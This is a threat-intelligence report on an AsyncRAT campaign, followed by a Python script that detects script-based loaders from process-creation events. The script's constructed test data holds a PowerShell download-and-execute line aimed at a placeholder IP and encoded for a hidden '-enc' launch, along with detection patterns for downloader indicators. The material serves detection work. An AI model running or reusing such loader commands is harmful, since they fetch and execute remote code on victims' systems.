Daily Summary
AsyncRAT sample submissions rose to 21 today, a 36% increase above the 7-day average (roughly 15 samples per day). The trend is rising, driven mainly by script-based loaders.
New Samples Detected
Script-based payloads dominate: PowerShell (.ps1) files account for 9 of the 21 samples and batch (.bat) files for 5. Executables (.exe) and screensaver (.scr) files contributed only 2 samples each. The remainder, a single JavaScript (.js) file plus one .rar and one .zip archive, points to a layered delivery chain in which a script, not a compiled binary, is the initial stage.
Distribution Methods
Delivery relies on phishing and social engineering. The prevalence of .ps1 and .bat files points to attachment-based lures or downloader scripts hosted on file-sharing platforms. The single .js file may be embedded in an Office document or weaponized PDF, or shipped inside one of the archives. The absence of macro-enabled Office files (e.g., .docm, .xlsm) in today's set is consistent with the continued shift away from VBA macros, which Office now blocks by default for files downloaded from the internet, toward simpler scripting languages.
Detection Rate
Static detection for these script-based variants remains moderate. Many signature-based engines flag common PowerShell indicators (an -EncodedCommand switch, a Net.WebClient download, an Invoke-Expression call) but miss scripts whose strings have been obfuscated or padded with junk comments. The .scr and .exe samples likely carry packed or encrypted AsyncRAT payloads, which defeat static signatures until the payload is unpacked in memory; such samples are caught more reliably by sandbox or endpoint behavioral analysis than by file scanning. Given these gaps, behavioral analytics (process lineage, command-line content, network connections) currently offer better coverage than file scanning alone.
C2 Infrastructure
Today's analysis identified 100 new C2 servers and a total of 121 new IOCs (domains, IPs, and URLs). No geographic clustering was observed, which points to a spread of hosting providers and possibly bulletproof hosting. With roughly five C2 servers per sample, the operators appear to be distributing infrastructure so that the loss or blocking of any one server exposes little of the campaign.
7-Day Trend
Activity has escalated over the past three days, and today's 36% jump above the 7-day average is the largest of the week. Sustained volume above the average indicates campaign acceleration rather than a one-day anomaly.
Security Analysis
A notable shift is the scarcity of compiled executables (2 of 21 samples) in favor of scripts and archives. This mirrors the broader adversary move toward script-based and living-off-the-land techniques, in which built-in Windows binaries do most of the work and little custom code touches disk. Defenders should monitor process-creation lineage for script hosts (cmd.exe, wscript.exe, cscript.exe) spawning powershell.exe, and for powershell.exe in turn spawning cmd.exe or rundll32.exe, and should block outbound connections to domains registered within the last 30 days. The most actionable defensive step today is a script-control policy for non-admin users, enforced through AppLocker script rules or Windows Defender Application Control (WDAC), so that unsigned .ps1, .bat and .js files cannot run from user-writable locations.
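The following Python block is an added example, not part of the original report, showing the kind of behavioral triage the Detection Rate and Security Analysis sections call for: it walks process-creation records (field names loosely follow Sysmon Event ID 1: ParentImage, Image, CommandLine), flags the parent/child chains typical of batch and JavaScript loaders handing off to PowerShell, decodes any -EncodedCommand blob so the stage-two script can be inspected, and scans both the raw and decoded command line for downloader indicators. The four events, the stage-two script and the IP address 198.51.100.7 are constructed for illustration and do not come from today's samples.

```python
"""Behavioral triage of process-creation events for script-based loaders.

Added example; not code from the original report. The events at the bottom
are constructed and only loosely follow Sysmon Event ID 1 field names.
"""
import base64
import binascii
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Parent -> child pairs matching the loader chains described in the report:
# script hosts handing off to PowerShell, and PowerShell spawning LOLBins.
SUSPICIOUS_CHAINS = {
    ("cmd.exe", "powershell.exe"),
    ("wscript.exe", "powershell.exe"),
    ("cscript.exe", "powershell.exe"),
    ("mshta.exe", "powershell.exe"),
    ("powershell.exe", "cmd.exe"),
    ("powershell.exe", "rundll32.exe"),
    ("powershell.exe", "regsvr32.exe"),
}

# Command-line indicators common to PowerShell downloaders and launchers.
INDICATORS = {
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no-profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "policy-bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "invoke-expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "download": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I),
    "base64-decode": re.compile(r"frombase64string", re.I),
}

# -e, -ec, -enc, ... -EncodedCommand (any unambiguous prefix) plus a base64 blob.
ENCODED = re.compile(r"(?:^|\s)-(?:e|ec|en[a-z]*)\s+([A-Za-z0-9+/=]{16,})", re.I)


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def _name(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Plaintext of a -EncodedCommand blob (PowerShell expects UTF-16LE),
    or None when no blob is present or it does not decode cleanly."""
    m = ENCODED.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze(ev: ProcEvent) -> List[str]:
    """Reasons this event looks like a script-loader stage (empty = clean)."""
    reasons = []
    chain = (_name(ev.parent_image), _name(ev.image))
    if chain in SUSPICIOUS_CHAINS:
        reasons.append(f"chain:{chain[0]}->{chain[1]}")
    text = ev.command_line
    decoded = decode_encoded_command(text)
    if decoded is not None:
        reasons.append("encoded-command")
        text = text + " " + decoded  # scan the decoded stage too
    for label, pattern in INDICATORS.items():
        if pattern.search(text):
            reasons.append(label)
    return reasons


def triage(events: List[ProcEvent]) -> List[Tuple[int, List[str]]]:
    """(index, reasons) for every event that produced at least one reason."""
    results = []
    for i, ev in enumerate(events):
        reasons = analyze(ev)
        if reasons:
            results.append((i, reasons))
    return results


# Constructed stage-two script, encoded the way `powershell -enc` expects.
_STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s.ps1')"
_B64 = base64.b64encode(_STAGE2.encode("utf-16-le")).decode()
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [  # constructed; event 0 is a benign admin script
    ProcEvent(r"C:\Windows\explorer.exe", _PS, r"powershell.exe -File C:\Scripts\backup.ps1"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", _PS, f"powershell -nop -w hidden -enc {_B64}"),
    ProcEvent(_PS, r"C:\Windows\System32\rundll32.exe", r"rundll32.exe C:\Users\Public\upd.dll,Start"),
    ProcEvent(r"C:\Windows\System32\wscript.exe", _PS, r"powershell -ep bypass -File C:\Users\Public\invoice.ps1"),
]

if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"[{idx}] {_name(ev.parent_image)} -> {_name(ev.image)}: {', '.join(reasons)}")
```

Run as written, the script reports events 1 to 3 and leaves the explorer.exe-launched backup script alone; event 1 is flagged on the cmd.exe -> powershell.exe chain, the encoded command, the hidden window, and the download and Invoke-Expression strings recovered only after decoding, which is the point of inspecting the decoded stage rather than the raw command line.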